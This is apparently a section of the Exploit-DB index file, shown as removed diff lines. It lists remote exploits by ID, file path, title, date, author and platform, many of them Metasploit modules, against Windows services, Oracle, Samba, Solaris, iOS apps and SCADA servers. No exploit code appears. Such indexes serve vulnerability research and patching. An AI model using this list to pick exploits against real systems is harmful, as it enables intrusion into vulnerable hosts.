-16103,exploits/multiple/remote/16103.txt,"Majordomo2 - 'SMTP/HTTP' Directory Traversal",2011-02-03,"Michael Brooks",multiple,remote, -16105,exploits/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal (1)",2011-02-03,modpr0be,windows,remote, -16137,exploits/multiple/remote/16137.c,"Multiple Vendor Calendar Manager - Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",multiple,remote, -16145,exploits/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow (SEH)",2011-02-09,Fulcrum,windows,remote, -16149,exploits/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote, -16176,exploits/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,windows,remote, -16177,exploits/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow",2011-02-16,chap0,windows,remote, -16226,exploits/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote, -16208,exploits/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote, -16209,exploits/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote, -16227,exploits/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote, -16228,exploits/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote, -16229,exploits/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote, -16231,exploits/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote, -16238,exploits/hardware/remote/16238.txt,"iphone ishred 1.93 - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote, -16239,exploits/hardware/remote/16239.txt,"iPhone Guitar - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote, -16240,exploits/hardware/remote/16240.txt,"iphone pdf reader pro 2.3 - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote, -16242,exploits/windows/remote/16242.html,"Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow",2011-02-25,"Alexander Gavrun",windows,remote, -16243,exploits/hardware/remote/16243.py,"iphone folders 2.5 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote, -16244,exploits/hardware/remote/16244.py,"iphone ifile 2.0 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote, -16245,exploits/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote, -16259,exploits/windows/remote/16259.txt,"Home FTP Server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote, -16271,exploits/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote, -16275,exploits/hardware/remote/16275.txt,"COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution",2011-03-04,"Todor Donev",hardware,remote, -16278,exploits/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote, -16285,exploits/linux/remote/16285.rb,"NTP daemon readvar - Remote Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote, -16286,exploits/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote, -41785,exploits/linux/remote/41785.rb,"Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit)",2017-04-03,"Chris Hebert",linux,remote, -16289,exploits/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote, -16291,exploits/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16292,exploits/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,multiple,remote, -16293,exploits/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16294,exploits/multiple/remote/16294.rb,"Sun Java JRE - getSoundbank 'file://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16295,exploits/multiple/remote/16295.rb,"Apple QTJava - 'toQTPointer()' Arbitrary Memory Access (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16296,exploits/osx/remote/16296.rb,"Apple iTunes 8.1.1 (Mac OSX) - ITms Overflow (Metasploit)",2010-11-11,Metasploit,osx,remote, -16297,exploits/multiple/remote/16297.rb,"Java - 'Statement.invoke()' Trusted Method Chain (Metasploit)",2010-12-15,Metasploit,multiple,remote, -16298,exploits/multiple/remote/16298.rb,"Sun Java - JRE AWT setDiffICM Buffer Overflow (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16299,exploits/multiple/remote/16299.rb,"Mozilla Firefox 3.5 - 'escape()' Return Value Memory Corruption (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16300,exploits/multiple/remote/16300.rb,"Mozilla Suite/Firefox - Navigator Object Code Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16301,exploits/multiple/remote/16301.rb,"Mozilla Firefox - location.QueryInterface() Code Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16302,exploits/multiple/remote/16302.rb,"Signed Applet Social Engineering - Code Execution (Metasploit)",2011-01-08,Metasploit,multiple,remote, -16303,exploits/multiple/remote/16303.rb,"Opera 9 - Configuration Overwrite (Metasploit)",2010-07-27,Metasploit,multiple,remote, -16304,exploits/multiple/remote/16304.rb,"Opera historysearch - Cross-Site Scripting (Metasploit)",2010-11-11,Metasploit,multiple,remote, -16305,exploits/multiple/remote/16305.rb,"Java - RMIConnectionImpl Deserialization Privilege Escalation (Metasploit)",2010-09-27,Metasploit,multiple,remote, -16306,exploits/windows/remote/16306.rb,"Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote, -16308,exploits/multiple/remote/16308.rb,"Maple Maplet - File Creation / Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16309,exploits/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)",2010-09-20,Metasploit,multiple,remote, -16310,exploits/multiple/remote/16310.rb,"PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) (Metasploit)",2010-09-20,Metasploit,multiple,remote, -16311,exploits/linux/remote/16311.rb,"WU-FTPD - Site EXEC/INDEX Format String (Metasploit)",2010-11-30,Metasploit,linux,remote, -16312,exploits/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST) (Metasploit)",2010-12-14,Metasploit,multiple,remote, -16314,exploits/multiple/remote/16314.rb,"Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote, -16315,exploits/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) (Metasploit)",2010-12-14,Metasploit,multiple,remote, -16316,exploits/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)",2010-08-03,Metasploit,multiple,remote, -16317,exploits/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote, -16318,exploits/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote, -16319,exploits/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,multiple,remote, -16320,exploits/unix/remote/16320.rb,"Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,unix,remote, -16321,exploits/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1)",2010-04-28,Metasploit,linux,remote, -16322,exploits/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,solaris,remote, -16323,exploits/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Remote Heap Overflow (Metasploit)",2010-04-30,Metasploit,solaris_sparc,remote, -16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,multiple,remote, -16325,exploits/solaris/remote/16325.rb,"Sun Solaris sadmind - 'adm_build_path()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,solaris,remote, -16326,exploits/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution (Metasploit)",2010-07-25,Metasploit,solaris,remote, -16327,exploits/solaris/remote/16327.rb,"Solaris TelnetD - 'TTYPROMPT' Remote Buffer Overflow (2) (Metasploit)",2010-06-22,Metasploit,solaris,remote, -16328,exploits/solaris/remote/16328.rb,"Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)",2010-06-22,Metasploit,solaris,remote, -16329,exploits/solaris/remote/16329.rb,"Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,solaris,remote, -16330,exploits/solaris_sparc/remote/16330.rb,"Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote, -16331,exploits/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Remote Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16332,exploits/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16333,exploits/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)",2010-04-28,Metasploit,windows,remote, -16334,exploits/windows/remote/16334.rb,"Microsoft Private Communications Transport - Remote Overflow (MS04-011) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16336,exploits/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,windows,remote, -16337,exploits/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16338,exploits/windows/remote/16338.rb,"SapLPD 6.28 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16339,exploits/windows/remote/16339.rb,"Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)",2010-11-24,Metasploit,windows,remote, -16340,exploits/windows/remote/16340.rb,"Oracle 8i - TNS Listener 'ARGUMENTS' Remote Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote, -16341,exploits/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote, -16342,exploits/windows/remote/16342.rb,"Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote, -16343,exploits/windows/remote/16343.rb,"Oracle Secure Backup - NDMP_CONNECT_CLIENT_AUTH Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16344,exploits/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 - Transfer-Mode Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16345,exploits/windows/remote/16345.rb,"D-Link TFTP 1.0 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16346,exploits/windows/remote/16346.rb,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16347,exploits/windows/remote/16347.rb,"3Com TFTP Service (3CTftpSvc) - 'Mode' Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16348,exploits/windows/remote/16348.rb,"Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16349,exploits/windows/remote/16349.rb,"TFTPD32 < 2.21 - 'Filename' Remote Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16350,exploits/windows/remote/16350.rb,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)",2011-03-05,Metasploit,windows,remote, -16351,exploits/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16352,exploits/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16353,exploits/windows/remote/16353.rb,"AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16354,exploits/windows/remote/16354.rb,"Microsoft IIS - ISAPI 'w3who.dll' Query String Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote, -16355,exploits/windows/remote/16355.rb,"Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)",2010-07-25,Metasploit,windows,remote, -16356,exploits/windows/remote/16356.rb,"Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit)",2010-07-25,Metasploit,windows,remote, -16357,exploits/windows/remote/16357.rb,"Microsoft IIS - Phone Book Service Overflow (MS00-094) (Metasploit)",2010-04-30,Metasploit,windows,remote, -16358,exploits/windows/remote/16358.rb,"Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16359,exploits/windows/remote/16359.rb,"Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)",2010-09-20,Metasploit,windows,remote, -16360,exploits/windows/remote/16360.rb,"Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)",2010-09-21,Metasploit,windows,remote, -16361,exploits/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit)",2011-02-17,Metasploit,windows,remote, -16362,exploits/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)",2011-01-21,Metasploit,windows,remote, -16363,exploits/windows/remote/16363.rb,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)",2010-07-03,Metasploit,windows,remote, -16364,exploits/windows/remote/16364.rb,"Microsoft RRAS Service - Remote Overflow (MS06-025) (Metasploit)",2010-05-09,Metasploit,windows,remote, -16366,exploits/windows/remote/16366.rb,"Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)",2010-09-28,Metasploit,windows,remote, -16367,exploits/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)",2011-02-17,Metasploit,windows,remote, -16368,exploits/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)",2010-07-03,Metasploit,windows,remote, -16369,exploits/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,windows,remote, -16370,exploits/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16371,exploits/windows/remote/16371.rb,"Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)",2010-07-03,Metasploit,windows,remote, -16372,exploits/windows/remote/16372.rb,"Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)",2010-10-05,Metasploit,windows,remote, -16373,exploits/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,windows,remote, -16374,exploits/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution (Metasploit)",2010-12-02,Metasploit,windows,remote, -16375,exploits/windows/remote/16375.rb,"Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit)",2010-08-25,Metasploit,windows,remote, -16376,exploits/windows/remote/16376.rb,"Novell NetIdentity Agent - XTIERRPCPIPE Named Pipe Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote, -16377,exploits/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)",2010-07-25,Metasploit,windows,remote, -16378,exploits/windows/remote/16378.rb,"Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)",2010-05-09,Metasploit,windows,remote, -16379,exploits/windows/remote/16379.rb,"Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)",2010-05-09,Metasploit,windows,remote, -16380,exploits/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC - Remote Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16381,exploits/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Remote Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote, -16382,exploits/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote, -16383,exploits/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote, -16384,exploits/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote, -16385,exploits/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16388,exploits/hardware/remote/16388.rb,"NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote, -16389,exploits/windows/remote/16389.rb,"Omni-NFS Server - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16390,exploits/windows/remote/16390.rb,"Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote, -16391,exploits/windows/remote/16391.rb,"EMC AlphaStor Agent - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16392,exploits/windows/remote/16392.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)",2011-01-24,Metasploit,windows,remote, -16393,exploits/windows/remote/16393.rb,"Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit)",2010-04-30,Metasploit,windows,remote, -16394,exploits/windows/remote/16394.rb,"Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote, -16395,exploits/windows/remote/16395.rb,"Microsoft SQL Server - Payload Execution (Metasploit)",2010-12-21,Metasploit,windows,remote, -16396,exploits/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote, -16397,exploits/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password (Metasploit)",2010-09-20,Metasploit,windows,remote, -16398,exploits/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)",2010-04-30,Metasploit,windows,remote, -16399,exploits/windows/remote/16399.rb,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16400,exploits/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote, -16401,exploits/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16402,exploits/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16403,exploits/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Remote Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16404,exploits/windows/remote/16404.rb,"Computer Associates ARCserve - REPORTREMOTEEXECUTECML Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16405,exploits/windows/remote/16405.rb,"CA BrightStor Universal Agent - Remote Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16406,exploits/windows/remote/16406.rb,"CA BrightStor Discovery Service - Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16407,exploits/windows/remote/16407.rb,"CA BrightStor ARCserve - Tape Engine Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16408,exploits/windows/remote/16408.rb,"CA BrightStor Discovery Service - TCP Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16409,exploits/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (2)",2010-11-03,Metasploit,windows,remote, -16410,exploits/windows/remote/16410.rb,"Computer Associates - Alert Notification Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16411,exploits/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Remote Buffer Overflow (Metasploit) (3)",2010-11-03,Metasploit,windows,remote, -16412,exploits/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote, -16413,exploits/windows/remote/16413.rb,"CA BrightStor ArcServe - Media Service Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16414,exploits/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - 'GCR NETWORK' Remote Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote, -16415,exploits/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - 'rxsSetDataGrowthScheduleAndFilter' Remote Buffer Overflow (Metasploit)",2011-03-10,Metasploit,windows,remote, -16416,exploits/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflows (Metasploit)",2010-11-04,Metasploit,windows,remote, -16417,exploits/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote, -16418,exploits/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16419,exploits/windows/remote/16419.rb,"Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16420,exploits/windows/remote/16420.rb,"Firebird Relational Database - 'SVC_attach()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16421,exploits/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote, -16422,exploits/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16423,exploits/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote, -16424,exploits/windows/remote/16424.rb,"Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16425,exploits/windows/remote/16425.rb,"Asus Dpcproxy - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16426,exploits/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16427,exploits/windows/remote/16427.rb,"Microsoft Windows RSH daemon - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16428,exploits/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16429,exploits/windows/remote/16429.rb,"HP OpenView - Operations OVTrace Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16430,exploits/windows/remote/16430.rb,"BigAnt Server 2.2 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16431,exploits/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 - Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16432,exploits/windows/remote/16432.rb,"Firebird Relational Database - 'isc_create_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16433,exploits/windows/remote/16433.rb,"BomberClone 0.11.6 - Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote, -16434,exploits/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16435,exploits/windows/remote/16435.rb,"HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote, -16436,exploits/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote, -16437,exploits/windows/remote/16437.rb,"Borland Interbase - 'isc_create_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16438,exploits/windows/remote/16438.rb,"eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16439,exploits/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Remote Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote, -16440,exploits/windows/remote/16440.rb,"Firebird Relational Database - 'isc_attach_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16441,exploits/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, -16442,exploits/windows/remote/16442.rb,"Microsoft DirectX DirectShow - SAMI Buffer Overflow (MS07-064) (Metasploit)",2010-10-05,Metasploit,windows,remote, -16443,exploits/windows/remote/16443.rb,"Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2)",2010-08-25,Metasploit,windows,remote, -16444,exploits/windows/remote/16444.rb,"TinyIdentD 2.2 - Remote Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16445,exploits/windows/remote/16445.rb,"Bopup Communications Server - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16446,exploits/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client (Windows) - Remote Buffer Overflow (Metasploit)",2010-10-09,Metasploit,windows,remote, -16447,exploits/windows/remote/16447.rb,"Borland Interbase - 'isc_attach_database()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16448,exploits/windows/remote/16448.rb,"BakBone NetVault - Remote Heap Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16449,exploits/windows/remote/16449.rb,"Borland Interbase - 'SVC_attach()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16450,exploits/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service - Authentication Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote, -16451,exploits/windows/remote/16451.rb,"eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote, -16452,exploits/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow (Metasploit)",2010-05-11,Metasploit,windows,remote, -16453,exploits/windows/remote/16453.rb,"Borland Interbase - 'Create-Request' Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16454,exploits/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote, -16455,exploits/windows/remote/16455.rb,"HP - 'OmniInet.exe' MSG_PROTOCOL Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,windows,remote, -16456,exploits/windows/remote/16456.rb,"Realtek Media Player Playlist - Remote Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote, -16457,exploits/windows/remote/16457.rb,"LANDesk Management Suite 8.7 - Alert Service Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote, -16458,exploits/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote, -16459,exploits/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote, 